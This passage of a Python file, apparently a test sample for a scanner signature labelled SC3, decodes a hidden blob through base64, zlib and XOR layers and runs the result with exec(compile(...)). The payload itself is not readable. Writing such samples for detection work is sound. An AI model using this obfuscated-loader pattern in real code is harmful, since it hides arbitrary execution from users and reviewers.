+Pfcgmiv3nSaq6E2M5hAX1ftSUSK9v9IOwwRTWl2PMxt7r75W72fDYN0mV8og/BoQwq/N+iiv0B5JtZvK/fFl6NObFOvz24z8V0UtR"
_K = bytes.fromhex("b238b9685c77ae7d5ae65dd2")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
